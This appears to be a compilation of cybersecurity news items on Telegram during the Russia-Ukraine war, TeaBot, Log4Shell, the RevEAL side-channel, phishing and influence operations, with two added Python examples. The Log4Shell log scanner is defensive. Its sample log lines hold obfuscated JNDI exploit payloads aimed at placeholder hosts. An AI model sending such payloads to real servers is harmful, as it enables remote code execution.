
Report: Telegram's New Battleground for Cybercriminals Amid Russia-Ukraine War

 

The Telegram messenger has become increasingly important in the ongoing war between Russia and Ukraine, as it is widely used by hacktivists and cybercriminals alike.

According to a report by cybersecurity firm Check Point Research, the number of Telegram groups related to the conflict has grown sixfold since February 24, and some of them, dedicated to particular topics, have grown to over 250,000 members.

The following three categories have exploded in popularity as a direct result of Russia's invasion of Ukraine: 
• Various "news feeds" that claim to provide credible reports from Ukraine 
• Volunteer hackers that carry out DDoS and other attacks against Russian organisations 
• Fundraising groups that collect cryptocurrency donations, purportedly in support of Ukraine 

The "IT Army of Ukraine," which presently has 270,000 members, stands out among the groups leading anti-Russia cyber-warfare activities. It was formed by Ukrainian cyber specialists, and the results of its operations became evident quickly. 

Apart from launching DDoS attacks against important Russian websites, the group also publishes the personal information of Russian decision-makers and other key players in the conflict. The majority of Telegram groups that claim to collect "donation support", by contrast, are run by scammers who take advantage of the situation to steal people's money. 

Similar operations based on phishing emails have been reported, and the same thing is now happening on Telegram, with some of these groups having up to 20,000 members. 

Unverified news

News streams that bypass mainstream outlets and publish unedited, uncensored feeds from the battle zone around the clock are the third growing category. Apart from the fact that publishing unedited battle scenes is against journalistic ethics, many of the stories shared on these channels are unchecked or unverified and might easily be fabricated. 

As geopolitical analyst Michael Horowitz showed when sharing realistic-looking footage of an air dogfight that was actually rendered with a video game engine, this is a concern even on established social media platforms.

According to Check Point, these channels continue to attract large numbers of users: 'Ukraine War Report,' for example, has 20,000 members, while 'Russia vs. Ukraine Live News' has 110,000. 'Ukrainian Witness' (видетел крaин), another news channel dedicated to exposing Russian war crimes, has reached 100,000 subscribers. The goal of groups that actively spread false material on Telegram is to demoralise the opponent, in the hope that the content will be reshared on other platforms as well. While some of these channels may provide genuine information, it is practically impossible for users to tell true from fake news. 

To protect themselves from fraud and cybercrime when using Telegram, the researchers advised users to be cautious about the information they share on the network, to avoid clicking on links of unknown origin, to be wary of unusual requests, and to avoid donating money to unknown sources.

Cyber-Attack on New York Ethics Watchdog



New York's ethics watchdog, the Joint Commission on Public Ethics (JCOPE), has shut down its systems after state information technology staff discovered a malicious cyber-attack on its web servers. 

The watchdog, which regulates lobbying at the State Capitol, reported last Friday evening that it had launched an investigation to determine the scope of the attack and the perpetrators behind it after receiving an alert about suspicious activity on JCOPE's network.

Following the attack, the Commission shut down its systems as a precaution, including its lobbying application and its financial disclosure statement online filing system.

JCOPE said the systems will remain offline until the agency can safely resume normal operations. So far, agency officials have not said who was responsible for the attack, but they plan to work with state law enforcement to investigate it.

"Our first and highest priority is the safety and integrity of the data entrusted to the Commission by the regulated community," said JCOPE Executive Director Sanford Berland in a statement.

Following the attack, the public was unable to access data about lobbyist expenditures, and lobbyists were unable to submit their required filings. JCOPE said it will grant automatic extensions to those who miss a deadline because of the outage. 

Walter McClure, a JCOPE spokesperson added that "the outage also affects searches using the agency’s legacy lobbyist filing system, which was in use until 2019".

Android Malware in Google Play Stealing Victim's Data

 

Threat intelligence researchers have warned that an Android banking trojan known as 'TeaBot', which steals users' private data and SMS messages, has been downloaded thousands of times via the Google Play Store. According to the researchers, TeaBot first became known at the beginning of 2021 as a trojan designed to steal victims' text messages. 

According to online fraud management and prevention firm Cleafy, TeaBot was initially distributed through smishing (SMS phishing) campaigns using a predefined list of lures, such as VLC Media Player, TeaTV, DHL and UPS. 

The researchers added: "In the last months, we detected a major increase of targets which now count more than 400 applications, including banks, crypto exchanges/wallets, and digital insurance, and new countries such as Russia, Hong Kong, and the US." 

Since February, TeaBot has supported new languages including Russian, Mandarin Chinese and Slovak, which helps the operators display custom messages during the installation phase. 

On February 21, Cleafy's Threat Intelligence and Incident Response (TIR) team detected an application published on the official Google Play Store that was acting as a dropper, delivering TeaBot through a fake update procedure. Once the user installs it, the dropper asks them to update immediately through a popup message. 

"The dropper lies behind a common QR Code & Barcode Scanner and it has been downloaded more than 10,000 times. All the reviews display the app as legitimate and well-functioning," the team added.

Log4Shell Utilized for Crypto Mining and Botnet Creation

 

The critical vulnerability in Apache's widely used Log4j logging library, known as Log4Shell, has not caused the calamity that was predicted, but it is still being exploited, primarily from cloud servers in the United States. Because it was straightforward to exploit and because the Java logging library is embedded in many different services, Log4Shell drew attention over concerns that it would be widely abused by attackers. 

According to a Barracuda study, the targeting of Log4Shell has fluctuated over the past few months, but the frequency of exploitation attempts has remained fairly steady. Barracuda found that the majority of exploitation attempts originated in the United States, followed by Japan, Central Europe and Russia. 

The vulnerability was disclosed in December 2021, when the current release was Log4j 2.14.1; that version and all earlier Log4j 2 releases were vulnerable to CVE-2021-44228, also known as "Log4Shell," a critical zero-day remote code execution bug.

Apache, the library's maintainer, first attempted to fix the problem with version 2.15.0, but follow-up vulnerabilities and incomplete fixes prolonged the patching race until the end of the year, when version 2.17.1 finally addressed the remaining issues. 

Mirai malware builds a botnet of remotely controlled bots by targeting publicly exposed network cameras, routers and other devices. The threat actor can then use this botnet to launch DDoS attacks against a single target, exhausting its resources and disrupting its online services. The actors behind these operations either rent the botnet's firepower to others or carry out DDoS attacks to extort money from businesses. Other payloads observed in current Log4j exploitation include: 

  • BillGates (DDoS)
  • Kinsing (cryptominer) 
  • XMRig (cryptominer) 
  • Muhstik (DDoS) 

The payloads range from harmless online jokes to crypto-mining software, which uses other people's computers to perform proof-of-work hashing and earn the attacker cryptocurrency such as Monero. 

The simplest way to protect against these attacks is to update Log4j to version 2.17.1 or later and to keep all web applications up to date. Even if most threat actors lose interest, some will continue to target vulnerable Log4j deployments because the numbers are still significant. 

High-value organisations that would be lucrative ransomware targets have largely applied the security updates, but neglected systems still running earlier versions remain good targets for crypto mining and DDoS attacks.
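Since the fix is to upgrade, the check a defender still wants is whether exploitation attempts are hitting their own servers. The following Python script is an added example (not code from Barracuda or the Log4j project) that scans web-server log lines for the JNDI lookup behind CVE-2021-44228, after undoing the URL encoding and the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) attackers use to evade naive string matching. The sample log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Once obfuscation is collapsed, any JNDI lookup is a Log4Shell probe
# (Log4j matches lookup names case-insensitively).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(m: re.Match) -> str:
    """Resolve the obfuscation lookups attackers nest around 'jndi'."""
    body = m.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> default value 'j'
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep and key.lower() == "lower":    # ${lower:J} -> j
        return value.lower()
    if sep and key.lower() == "upper":    # ${upper:j} -> J
        return value.upper()
    return m.group(0)                     # unknown lookup: leave it in place


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double-encoded payloads), then collapse
    nested lookups from the inside out until nothing changes."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        collapsed = INNERMOST_LOOKUP.sub(_resolve_one, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan_log(lines):
    """Return the indices of log lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access-log lines (not real traffic): a plain probe, a
# ${lower:} probe in the User-Agent, a ${::-} probe, a double-URL-encoded
# probe, and two benign requests (the last one uses an unrelated lookup).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '203.0.113.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252F203.0.113.9%252Fa%257D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Dec/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2021:12:00:06 +0000] "GET /?price=${total} HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print(f"line {i}: {normalize(SAMPLE_LOG[i])}")
```

The normaliser only undoes the obfuscation forms handled in `_resolve_one`; Log4j supports further lookups (such as `${date:...}`) that an attacker can abuse, so treat this as triage for log review, not as a substitute for upgrading Log4j. Matching on `${jndi:` after normalisation, rather than on a fixed list of payload strings, is what catches the variants.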

Hackers Becoming More Advanced at Escaping AI/ML Technologies

 

Deep Instinct's Threat Research team analysed attack volumes and types, used the results to forecast future cybersecurity scenarios and what motivates attackers, and laid out steps a company can take to protect itself from future cyberattacks. Key takeaways from the report include 2021 threat patterns which suggest that bad actors are becoming more sophisticated at evading AI/ML-based defences, forcing companies to redouble their innovation efforts. 

Particular attack vectors grew substantially, including a 170% rise in the use of Office droppers and a 125% rise across all threat types combined. The number of malware variants is considerably higher than before the pandemic. Malicious actors have also made a considerable shift from older programming languages such as C and C++ towards newer languages such as Python and Go, which are easier to learn and program in. 

Because malware in these languages is still less common, it is less likely to be caught by security tools or recognised by analysts. "Recent major events, such as Log4j and Microsoft Exchange server attacks, have placed a heightened priority on security, but these threats have long deserved the attention they're just now getting on a global level. The results of this research shed light on the wide-ranging security challenges that organizations face on a daily basis," said Deep Instinct CEO Guy Caspi. 

Other Attack Volume Types

Supply Chain Attacks - Large organisations with broad customer bases became frequent targets of supply chain attacks in 2021, as attackers seek access to their environments and, by proxy, to their customers. 

Public and Private Sector Collaboration - A great deal of partnership between international law enforcement agencies was seen in the past year, aimed at identifying and arresting threat actors. 

High Impact of Zero-days - Major vulnerabilities were exploited within a day of disclosure. A prominent example is the HAFNIUM group's activity, which came to light after Microsoft disclosed several zero-day vulnerabilities in Exchange Server. 

Attackers have also become better at evading detection and escalating privileges. Threat actors have started investing in anti-AI attack techniques and incorporating them into their campaigns.

T-Mobile Users Impacted by August Data Breach are at Risk of Identity Theft

 

A new warning was issued on Wednesday to victims of the T-Mobile data breach about the risk of identity theft. New York State Attorney General Letitia James warned those affected by the August 2021 breach that their personal details may be circulating for sale on the dark web. 
 
In August 2021, T-Mobile disclosed a data breach that compromised the personal details of millions of T-Mobile customers, including former and prospective customers.  
 
Of the 53 million people affected, more than 4 million were New York residents whose names, dates of birth, Social Security numbers and driver's licence details were exposed, according to the press release from the Attorney General's office.   
 
Additionally, the attackers stole technical data, including international mobile equipment identities (IMEIs) and international mobile subscriber identities (IMSIs). An IMEI, which is also often used for advertising purposes, is a unique fingerprint for a device that cannot be reset.  
 
“Recently, a large subset of the information compromised in the breach was discovered for sale on the dark web — a hidden portion of the Internet where cybercriminals buy, sell, and track personal information,” the warning reads.  
 
“Many individuals received alerts through various identity theft protection services informing them that their information was found online in connection with the breach, confirming that impacted individuals are at heightened risk for identity theft.” Officials from California, Florida, and several other states issued similar warnings. 
 
The state attorneys general noted that identity protection services have already alerted affected individuals that their personal details were found online. Cybercrime forums have come under increased pressure from state, federal and international law enforcement, but the buying and selling of personal data remains an increasingly active criminal trade.  
 
Anyone who believes they were affected by the breach is advised to take appropriate steps to protect themselves from identity theft. This includes checking credit reports, contacting the Equifax, Experian and TransUnion credit bureaus to place a free credit freeze, and asking the credit reporting agencies to add fraud alerts.

Researchers Reveal New Side-Channel Attack on Homomorphic Encryption

 

A group of academics from North Carolina State University and Dokuz Eylul University has revealed the "first side-channel attack" on homomorphic encryption, which can be used to disclose data while it is being encrypted. 

Aydin Aysu, one of the authors of the study, stated, "Basically, by monitoring power consumption in a device that is encoding data for homomorphic encryption, we are able to read the data as it is being encrypted. This demonstrates that even next generation encryption technologies need protection against side-channel attacks." 

Homomorphic encryption is a form of encryption that allows certain computations to be performed directly on encrypted data without first decrypting it. It is designed to protect privacy by allowing sensitive data to be shared with third-party services, such as data analytics providers, for further processing while the underlying data remains encrypted and therefore inaccessible to the service provider. 

In other words, the purpose of homomorphic encryption is to make it easier to build end-to-end encrypted storage and computation services that do not require the data owner to share their secret keys with third parties. The researchers proposed a data leakage attack based on a vulnerability in Microsoft SEAL, the company's open-source implementation of the technology, which could be abused to recover part of a homomorphically encrypted plaintext message, undoing the privacy guarantees.

The attack, dubbed RevEAL, takes advantage of a "power-based side-channel leakage of Microsoft SEAL prior to v3.6 that implements the Brakerski/Fan-Vercauteren (BFV) protocol" and "targets the Gaussian sampling in the SEAL's encryption phase and can extract the entire message with a single power measurement," according to the researchers. 

SEAL versions 3.6 and later, released from December 3, 2020 onwards, use a different sampling technique, according to the researchers, who also warn that future versions of the library may contain a "different vulnerability." 

Kim Laine, Microsoft's principal research manager who heads the Cryptography and Privacy Research Group, stated in the release notes, "Encryption error is sampled from a Centered Binomial Distribution (CBD) by default unless 'SEAL_USE_GAUSSIAN_NOISE' is set to ON. Sampling from a CBD is constant-time and faster than sampling from a Gaussian distribution, which is why it is used by many of the NIST PQC finalists."
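The release note above contrasts Gaussian noise sampling with centered binomial sampling. The Python below is an added illustration, not code from Microsoft SEAL or from the RevEAL paper: it implements a CBD_eta sampler, whose work per coefficient is fixed, next to a deliberately simple rejection-sampling discrete Gaussian (an assumption for the example; SEAL's actual pre-3.6 sampler differs) whose loop count depends on the value being produced. The statistics helper checks the textbook properties of CBD_eta (mean 0, variance eta/2); sigma = 3.2 is used only as a representative noise width.

```python
import math
import random


def cbd_sample(eta: int, randomness: bytes) -> list:
    """Centered binomial distribution CBD_eta: each coefficient is
    (a_1 + ... + a_eta) - (b_1 + ... + b_eta) over 2*eta uniformly random
    bits. Every coefficient consumes exactly 2*eta bits through the same
    additions, whatever value comes out, so control flow and memory access
    do not depend on the (secret) noise."""
    width = 2 * eta
    bits = [(byte >> i) & 1 for byte in randomness for i in range(8)]  # LSB first
    samples = []
    for start in range(0, len(bits) - width + 1, width):
        chunk = bits[start:start + width]
        samples.append(sum(chunk[:eta]) - sum(chunk[eta:]))
    return samples


def gaussian_rejection_sample(sigma: float, rng: random.Random, tail: float = 6.0):
    """Illustrative discrete Gaussian via rejection sampling (an assumption
    for this example, not SEAL's own sampler). Returns (sample, attempts).
    The loop repeats a random, value-dependent number of times, which is
    the kind of behaviour a power trace can distinguish."""
    bound = int(math.ceil(tail * sigma))
    attempts = 0
    while True:
        attempts += 1
        x = rng.randint(-bound, bound)
        if rng.random() < math.exp(-(x * x) / (2.0 * sigma * sigma)):
            return x, attempts


def cbd_stats(eta: int, n_coeffs: int, seed: int = 1):
    """Mean and variance of n_coeffs CBD_eta samples from a seeded RNG.
    CBD_eta has mean 0 and variance eta/2."""
    rng = random.Random(seed)
    randomness = bytes(rng.getrandbits(8) for _ in range(n_coeffs * 2 * eta // 8))
    s = cbd_sample(eta, randomness)
    mean = sum(s) / len(s)
    var = sum((x - mean) ** 2 for x in s) / len(s)
    return mean, var


def sampling_profile(n: int = 2000, eta: int = 2, sigma: float = 3.2, seed: int = 1):
    """Per-sample work of the two samplers over n draws: CBD always uses
    2*eta bits; the rejection sampler's attempt count varies per call."""
    rng = random.Random(seed)
    gaussian_attempts = {gaussian_rejection_sample(sigma, rng)[1] for _ in range(n)}
    return {
        "cbd_bits_per_coeff": 2 * eta,
        "gaussian_attempt_counts": sorted(gaussian_attempts),
    }


if __name__ == "__main__":
    print("CBD_2 over 0x0c:", cbd_sample(2, b"\x0c"))
    print("CBD_2 mean/var:", cbd_stats(2, 100_000))
    print(sampling_profile())
```

"Constant-time" in the sense the release note uses means the sequence of operations does not depend on the sampled noise; the CBD loop meets that because every coefficient takes the same path, whereas the rejection sampler's set of attempt counts shows how many different execution lengths one call can have. Python itself gives no constant-time guarantees, so the point is the algorithmic structure, not this script's actual power trace.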

Cyber Attacks Targeted on Websites Using Wordpress

Thirty Ukrainian university websites were compromised in a targeted campaign by a hacking group supporting Russia's invasion of Ukraine. In a recent report, researchers at Wordfence said the attacks had a major impact on Ukrainian educational institutions. The group, known as the Monday Group, whose members call themselves 'the Mxonday', has openly supported the invasion and has attacked WordPress-hosted websites far more heavily in the two weeks since it began. 


According to the Wordfence blog, the firm protects more than 8,000 Ukrainian websites, around 300 of which belong to educational institutions; it also protects government, police and military websites. The company said it saw a spike of 144,000 attacks on February 25, the second day of the military assault, three times the number of attacks it normally observed at the start of the month across the Ukrainian websites it protects. According to founder and CEO Mark Maunder, one threat actor began attacking Ukrainian websites continuously immediately after the invasion. 

An investigation found four IP addresses associated with the campaign, all belonging to a VPN service based in Sweden. The group also has ties to Brazil, from where Wordfence believes it is operating, but the individuals behind the attacks have not yet been identified. The report follows new research from ESET describing several malware families used in targeted attacks against organisations in Ukraine, including a destructive campaign using HermeticWiper. 

The attacks comprised three components: HermeticWiper, which corrupts a system and renders it inoperable; HermeticWizard, which spreads HermeticWiper across the local network via WMI and SMB; and HermeticRansom. According to the blog, the attack began a few hours before the start of the Russian invasion, and the malware used suggests the campaign was planned months in advance. ESET says HermeticWiper was found on hundreds of systems in at least five Ukrainian organisations, and that no firm link to a known threat actor has yet been established.

E-Bike Phishing Sites Abuse Google Ads to Push Scams

 

A large-scale phishing campaign involving over 200 scam sites is deceiving users into handing over their sensitive data to fake investment schemes that impersonate genuine brands.
Two security analysts, Ankit Dobhal and Aryan Singh, state in their research that the campaign has caused financial losses of up to $1,000,000 across tens of thousands of victims. 

The fraudulent operation was discovered by the Singapore-headquartered security firm CloudSEK, which shared its report with the media, stating that the campaign targets Indian audiences through Google Ads and search engine optimisation, drawing them to hundreds of fake websites. 

The Indian government has recently introduced policies to stimulate the growth of the country's electric vehicle (EV) sector. According to Indian industry analyses, these policies will bring the sector a compound annual growth rate of 90% before the end of the decade, making it a $200 billion market. The country is already seeing a boom in the sector: over 400 EV start-ups have been founded, and existing automotive companies are expanding their EV operations. 

Exploiting this boom, the threat actors have set up an explosion of websites that lure victims with false information. They ensure a steady influx of potential victims by abusing Google Ads, stuffing their phony sites with keywords, and impersonating popular companies such as Revolt and Ather. 

In many cases the threat actors simply copy the content, layout, style and images of the genuine sites to create clones. In other cases, the scammers build entirely fictitious marketplaces around generic words such as "ebike". 

When users visit the websites, the scammers prompt them to register by entering their full name, address, email address and phone number. After registration, the scammers ask them to pay a fee to become an EV dealer or to purchase a product on the site.

Google TAG Takes Down Coordinated Influence Operation Spreading Fake Information

 

Google's Threat Analysis Group (TAG), in its latest bulletin, provides an overview of the coordinated influence operations its staff tracked in January 2022, involving multiple countries. 
 
According to Google TAG, four YouTube channels, two AdSense accounts, one Blogger blog and six domains, used to generate revenue by displaying advertisements, were removed as part of coordinated influence operations linked to Belarus, Moldova and Ukraine. The campaign "was sharing content in English that was about a variety of topics including US and European current events," threat analysts explained.   

To limit the spread of misinformation, Google TAG also terminated three YouTube channels that uploaded content in Arabic critical of former Sudanese president Omar al-Bashir and supportive of the 2019 Sudanese coup d'état.   
 
Additionally, Google TAG handled a relatively large "influence operation linked to China." In January, threat analysts terminated 4,361 YouTube channels for spreading Chinese-language spam; a small subset of these channels uploaded content in both Chinese and English concerning China and US foreign affairs.   
 
“We terminated 4361 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China. These channels mostly uploaded spammy content in Chinese about music, entertainment, and lifestyle. A very small subset uploaded content in Chinese and English about China and U.S. foreign affairs. These findings are consistent with our previous reports,” says Google. 
 
Furthermore, Google TAG has banned YouTube channels, AdSense accounts, and Play developer accounts belonging to influence campaigns linked to Iraq, Turkey, and Libya's politics and current affairs.   
 
As the Russian-Ukraine conflict continues to escalate, Google has strengthened the safety measures for those in the region considered to be at higher risk of cyber assaults or attempted account compromise. This includes enabling two-factor authentication (2FA) and promoting the Advanced Protection Program.   
 
"Threat intel teams continue to look out for and disrupt disinfo campaigns, hacking, and financially motivated abuse, and are working with other companies and relevant government bodies to address these threats," Google said on Twitter.  
 
Last year, Google TAG blocked 3 YouTube channels used by Iranian attackers to publish content in Bosnian and Arabic condemning the actions of the U.S. and the People’s Mujahedin Organization of Iran (PMOI), a militant organization fighting against the official Iranian government.

Telegram has Experienced a Global Outage

 

On Thursday, March 3, the popular messenger Telegram suffered an outage. Users reported the problems on Downdetector, a website that tracks problems with access to Internet resources. 

According to Downdetector, the outage began at around 14:00 Moscow time. The majority of those who filed complaints (56 percent) reported problems connecting to the server. Users also noted problems receiving messages (22 percent) and with the operation of the app (23 percent). 

The outage affected residents of Russian cities including Moscow and St. Petersburg. Users from Ukraine and Belarus also reported problems. 

A few days earlier, Pavel Durov had published the following statement: "We do not want Telegram to be used as a tool to exacerbate conflicts and incite interethnic discord. In the event of an escalation of the situation, we will consider the possibility of partially or completely restricting the operation of Telegram channels in the countries involved during the conflict." 

According to him, Telegram has recently been used more and more to spread fakes and unverified data about the war, and the administration is not able to check every publication for authenticity. Shortly afterwards, however, Durov promised not to restrict the messenger's operation in Ukraine. 

According to him, "a lot of users have asked us not to consider disabling Telegram channels for the period of the conflict, since we are the only source of information for them." But he urges users to "double-check and not take for granted the data that is published in Telegram channels during this difficult period." 

It is worth noting that in the week since the beginning of Russia's military operation in Ukraine, news channels on Telegram have gained 19.5 million new subscribers. VK, another Russian social network originally created by Pavel Durov, is also experiencing a new surge in popularity due to the technical problems of other social networks: views in the VK news feed rose by 5% over the week, and the average daily number of video views rose by 15%. People are looking to these platforms for up-to-date information from media outlets that are under hacker attack, and from eyewitnesses to events. 

Earlier, CySecurity News reported that three popular foreign social networks, Facebook, Instagram and Twitter, had begun to receive large numbers of complaints from residents of Russia.